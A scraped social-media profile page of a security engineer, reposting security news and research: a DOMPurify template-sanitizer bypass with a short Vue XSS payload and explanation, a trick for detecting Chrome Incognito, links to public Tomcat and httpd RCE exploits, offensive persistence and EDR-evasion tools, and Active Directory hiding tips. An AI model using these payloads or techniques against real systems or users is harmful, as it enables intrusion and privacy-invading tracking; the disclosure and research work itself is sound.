Olivia
Online
Ioannis Stais
@Einstais
IT Security Engineer & Director of Organization Security Testing @census_labs (Radio Callsign SV1TGF / 2020769)
New Book!
Athens, Naxos
Joined April 2009
593 Following
673 Followers
5.2K Posts
Inspired by master @kinugawamasato, here's a DOMPurify bypass, found by Codex:
```html
<script src="https://t.co/VyVDO220KQ"></script>
<script src="https://t.co/3brNNLrbBc"></script>
<div id="app"></div>
<script>
var d = '<span>{<foo></foo>{constructor.constructor("alert(1)")()}<foo></foo>}</span>';
document.getElementById('app').appendChild(
DOMPurify.sanitize(d, { SAFE_FOR_TEMPLATES: true, RETURN_DOM: true }));
new Vue({ el: '#app' });
</script>
```
SAFE_FOR_TEMPLATES is a DOMPurify option that strips template syntax like {{...}} so sanitized HTML can't smuggle expressions into a framework like Vue. This bypasses it.
How it works: DOMPurify's job is to delete dangerous code like {{...}} before it reaches Vue. Normally it checks twice, but the RETURN_DOM option skips the second check. So we sneak the payload past the first check by chopping {{...}} into harmless looking pieces, with junk <foo> tags between them. DOMPurify strips away the junk tags, the pieces fall back together into {{...}}, and Vue runs the code.
Fixed in 3.4.0.
Detailed breakdown: https://t.co/bzYSSy9rBX
Discovered a new method for detecting if someone is using Incognito in Chrome:
Write 512 tiny 1-byte responses into a scratch Cache API cache, then read:
https://t.co/gsVNLl57y6.estimate().usageDetails.caches
Normal Chrome: ~393kb
Incognito: ~85kb
Why? When you're in incognito, Chrome writes to memory instead of disk, which leaves less metadata residue
🚨 A third Linux kernel local-root flaw has been disclosed: Fragnesia. 🚨
Like Copy Fail & Dirty Frag, Fragnesia gives root on all major distributions. Every supported AlmaLinux release is affected.
Help us test the patched kernels: https://t.co/yCiumsl4Nr
NGINX rift: We autonomously discovered this 18 yr old heap overflow (CVE-2026-42945) in @nginx impacting version 0.6.27 to 1.30.0. If you use rewrite and set directive, you maybe impacted! Please update your NGINX or change the config to mitigate it. Read more at https://t.co/KeoblrGL24
Security things from the last few days:
- CopyFail (linux pwn'd)
- CopyFail 2/Dirty Frag
- 13 advisories in Next.js
- Over 70 CVEs addressed in MacOS 26.5
- ~50 CVEs addressed in iOS 26.5
- YellowKey (Windows Bitlocker pwn'd entirely)
- GreenPlasma (Windows privilege escalation)
- CVE-2026-21510 and CVE-2026-21513 confirmed to be used by Russia for Windows RCE
- CVE-2026-32202 separately confirmed to be used by Russia for sensitive document access
- Mini-Shai Hulud (over 300 JS and Python packages compromised via GitHub Action cache poisoning)
- Google confirms they have identified AI-powered exploitation of zero days in an unidentified "open-source, web-based system administration too"
- Canvas (popular LMS used in most schools) pwn'd entirely
- PAN-OS (palo alto networks) pwn'd with a 9.3 severity CVE-2026-0300
Are you scared yet?
PoCs for Apache Tomcat Unauth RCE (CVE-2026-34486) and Apache httpd Pre-auth RCE (CVE-2026-23918) are now public on our Github.
Tomcat exploit is fully reliable. httpd chain works in a controlled lab setup with a known info leak.
https://t.co/D3dg5iTuwP
https://t.co/2zyr1ds4Mo
‼️🚨 Pwn2Own Berlin 2026 just hit a wall. For the first time in 19-years, ZDI rejected dozens of working zero-day RCE submissions because organizers ran out of contest slots.
Rejected hackers are now going public with PoC demos and direct vendor disclosures, breaking Pwn2Own's usual secrecy.
▪️ AI surfaces a massive wave of 0-day RCEs.
▪️ Submissions overwhelm ZDI past max capacity.
▪️ Slots run out. Researchers with working chains get rejected.
▪️ "Revenge disclosures" begin. ← we are here.
Confirmed casualties so far:
▪️ @xchglabs : 86 vulnerabilities prepared (PyTorch, NVIDIA, Linux KVM, Oracle, Docker, Ollama, Chroma, LiteLLM, llama.cpp). All rejected. Now reporting directly to vendors with writeups dropping as patches land.
▪️ @ggwhyp : full-chain Firefox RCE on Windows. Rejected. Publicly demoed (HTML page → cmd.exe → calc.exe). Responsibly disclosed to Mozilla.
▪️ @yunsu_dev : working RCE chain, rejected. Submitting elsewhere.
▪️ @ryotkak : tried to register for 3+ weeks. ZDI confirmed "at maximum capacity, can't add extra contest days." Considered canceling flight and hotel.
▪️ @anzuukino2802 : Claude Code RCE PoC. Rejected.
▪️ @desckimh : 0-day RCEs in Ollama and LM Studio. Rejected.
Reported impact: a community-estimated 150+ researchers tried to register. Accepted contestants are now being warned about collisions. Rejected vulnerabilities going to bug bounty programs may trigger pre-event patches that invalidate the work of those who got in.
ZDI has not publicly addressed the capacity issue. The event still runs May 14-16 in Berlin.
I was hoping to compete in Pwn2Own with a Firefox full-chain entry, but unfortunately it was rejected. I’ve reported the vulnerability to the Mozilla team.
TailVNC — Drop-in Windows VNC persistence over Tailscale. Single binary, Session 0 bypass, zero exposed ports. Built for offensive security & ops. Inspired by @Yeeb_ 's SockTail.
https://t.co/EaN4DycFi4
#redteam #Pentesting #CyberSecurity
someone built an OPENSOURCE MILITARY RADAR that tracks multiple targets up to 20km away
its called AERIS-10, full github repo schematics, PCB layouts, FPGA code, python GUI, everything under MIT license
commercial phased array radar starts at $250,000. military surplus is $10,000-50,000 but its decades old analog junk with no electronic beam steering
this does electronic beam steering at 10.5GHz, pulse compression, doppler processing, multi-target tracking on a real time map
two versions: 3km range with patch antenna array, 20km range with 32x16 slotted waveguide array and GaN AMPLIFIERS
custom frequency synthesizer, 16 front-end chips, FPGA doing all signal processing, GPS and IMU for ACCURATE target coordinates when the platform moves
all gerber files included so you can order the PCBs and build it yourself
one person built what defense contractors charge a quarter MILLION for and open sourced it
Can LNK files ever be trusted?
⚡ My latest blog post demonstrates several new LNK abuse methods, allowing you to fully spoof the target shown in Explorer. It also introduces tools to create your own LNKs, and detected spoofed ones yourself.
🐬 https://t.co/VZYVaEfO07
That's a helpful blog post about the React / Next.js vulnerabilities
https://t.co/aCPPRPm8Iw
Contains a react-scanner
https://t.co/OHut2g5MyZ
by @SLCyberSec
Ukrainian EW expert Serhii “Flash” says that this many cables are now required to connect jamming modules to antennas for one effective FPV jammer.
Russian control frequencies cover such a broad range now, and stretching the module frequency range decreases protection.
1/
Good news:
EDR-Redir "bind" mode now can work with Windows 10 🤓
https://t.co/PfCcG1xzmD
Google research created a dataset with rainbow tables for NetNTLMv1 with the 1122334455667788 challenge.
https://t.co/fLBxwTIY2H
Dataset is available for download at:
▪️https://t.co/mCt6R7y5Pk [Login required]
▪️gs://net-ntlmv1-tables
![sekurlsa_pw's tweet photo. Google research created a dataset with rainbow tables for NetNTLMv1 with the 1122334455667788 challenge.
https://t.co/fLBxwTIY2H
Dataset is available for download at:
▪️https://t.co/mCt6R7y5Pk [Login required]
▪️gs://net-ntlmv1-tables https://t.co/8sh34mJ4yT](https://pbs.twimg.com/media/G4B_bWxW4AAdjlR.png)
The Russians claim to have developed a system of a fiber optic FPV connected to a radio repeater drone.
The two fly together to the maximum range of the repeater, and the fiber FPV then continues on allowing particularly deep strikes.
Review the membership of groups for accounts and groups from another Active Directory forest. These are called "Foreign Security Principals" (FSPs) like the ones highlighted in the image. These FSPs are accounts that exist in another forest but have rights in the AD forest. Any FSPs should be scrutinized and removed if not required.
It's important to review and strictly control these since they may be highly privileged. In this example, compromise of another AD forest (TRDNET) would result in compromise of the current AD forest (https://t.co/zMxawYuyKn).
PowerShell script to scan privileged groups for FSPs:
https://t.co/BZ2RqekLNP
#ActiveDirectorySecurityTip
Every day Zoom.exe is re-started from the %AppDir% through a scheduled task it seems, making this an excellent persistence mechanism for side-loading.
🔒 Secure Bits 💡
Did you know 𝘆𝗼𝘂 𝗰𝗮𝗻 𝗵𝗶𝗱𝗲 𝗗𝗼𝗺𝗮𝗶𝗻 𝗔𝗱𝗺𝗶𝗻𝘀 from standard discovery—even from other admins?
Active Directory is a “𝗿𝗲𝗮𝗱-𝗺𝗮𝗻𝘆” 𝗱𝗶𝗿𝗲𝗰𝘁𝗼𝗿𝘆 by design.
But 𝗟𝗶𝘀𝘁 𝗢𝗯𝗷𝗲𝗰𝘁 𝗠𝗼𝗱𝗲 (𝗟𝗢𝗠) can change that.
🕵️♂️ Martin Handl shows how to leverage LOM to make Tier-0 accounts completely invisible to lower-tier admins.
🔧 𝗛𝗼𝘄 𝗶𝘁 𝘄𝗼𝗿𝗸𝘀:
1️⃣ 𝗘𝗻𝗮𝗯𝗹𝗲 𝗟𝗶𝘀𝘁 𝗢𝗯𝗷𝗲𝗰𝘁 𝗠𝗼𝗱𝗲 (𝗟𝗢𝗠)
Set dSHeuristics=001 in AD’s Configuration partition. No restart needed—takes effect instantly across the forest.
2️⃣ 𝗨𝘀𝗲 𝘀𝗽𝗲𝗰𝗶𝗮𝗹 𝗔𝗖𝗟 𝗰𝗼𝗺𝗯𝗶𝗻𝗮𝘁𝗶𝗼𝗻𝘀:
On the parent OU: Deny List contents
On the Tier-0 object itself: Deny List object
Together, this hides the object—even if a user has read access on the directory.
3️⃣ 𝗟𝗲𝘁 𝗔𝗱𝗺𝗶𝗻𝗦𝗗𝗛𝗼𝗹𝗱𝗲𝗿 𝗽𝗿𝗼𝗰𝗲𝘀𝘀 𝗱𝗼 𝘁𝗵𝗲 𝘄𝗼𝗿𝗸:
Apply custom ACLs to the AdminSDHolder container—those propagate automatically to all protected Tier-0 accounts every hour.
Bonus: Martin provides a PowerShell script to apply/revert this across any OU.
👁️ 𝗪𝗵𝗮𝘁’𝘀 𝘁𝗵𝗲 𝗲𝗳𝗳𝗲𝗰𝘁?
From the viewpoint of Tier-1 or Tier-2 users (like helpdesk or server admins), the hidden accounts don’t exist.
No group listing, no LDAP enumeration, no PowerShell output.
📌 𝗨𝘀𝗲 𝗿𝗲𝘀𝗽𝗼𝗻𝘀𝗶𝗯𝗹𝘆:
Hiding is not a replacement for proper security controls (Tiering, Security Baselines, LAPS, Role Separation, ..., ). But it adds another layer—obscurity that frustrates attackers and tools alike.
📄 𝗙𝘂𝗹𝗹 𝗽𝗼𝘀𝘁 + 𝗣𝗼𝘄𝗲𝗿𝗦𝗵𝗲𝗹𝗹 𝘀𝗰𝗿𝗶𝗽𝘁 by Martin Handl: https://t.co/w85WaiqYk4
(use auto-translation from German, it is definitely worth it!).
𝗛𝗶𝗱𝗶𝗻𝗴 𝗰𝗮𝗻 𝗯𝗲 𝗮𝗹𝘀𝗼 𝘂𝘀𝗲𝗱 𝗯𝘆 𝗮𝗻 𝗮𝘁𝘁𝗮𝗰𝗸𝗲𝗿, are you sure nothing hides in your Active Directory? How do you search for something like that?
✅ PS: I got you covered, 𝗔𝗗𝗣𝗿𝗼𝗯𝗲 can discover hidden accounts...
#ActiveDirectory #CyberSecurity #WindowsSecurity #RedTeam #LOM #ListObjectMode #T0 IQunit IT GmbH Martin Handl @BlueTeamDave
🔥 Microsoft patched a perfect 10.0 CVE in Entra ID (ex-Azure AD) that let attackers impersonate any user, even Global Admins—across every tenant worldwide.
🔑 MFA? Conditional Access? Logging? All bypassed. Total tenant takeover—SharePoint, Exchange, Azure resources.
Details here → https://t.co/HZkO0ItrxK
Last Seen Users on Sotwe
birazhornybirazporny 
Seen from Turkey
eva ᨳଓ .
Seen from United States
ตอกสด เสียบสด มันส์กว่าเยอะ
Seen from Thailand
ชอบเสียวคนแก่
Seen from Thailand
Joke
Seen from Indonesia
Raperin Yilmaz
Seen from Turkey
desi sex mms
Seen from Pakistan
M 🔞🔥
Seen from Saudi Arabia
malathi
Seen from France
ppc950626
Seen from United States
Trends for you
Most Popular Users
Elon Musk
@elonmusk
240.6M followers
Barack Obama
@barackobama
119.2M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.4M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.6M followers
NASA
@nasa
92.2M followers
Justin Bieber
@justinbieber
90.9M followers
KATY PERRY
@katyperry
87.6M followers
Taylor Swift
@taylorswift13
81.4M followers
Lady Gaga
@ladygaga
72.9M followers
Kim Kardashian
@kimkardashian
69.7M followers
Virat Kohli
@imvkohli
69.7M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.8M followers
Neymar Jr
@neymarjr
62.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.7M followers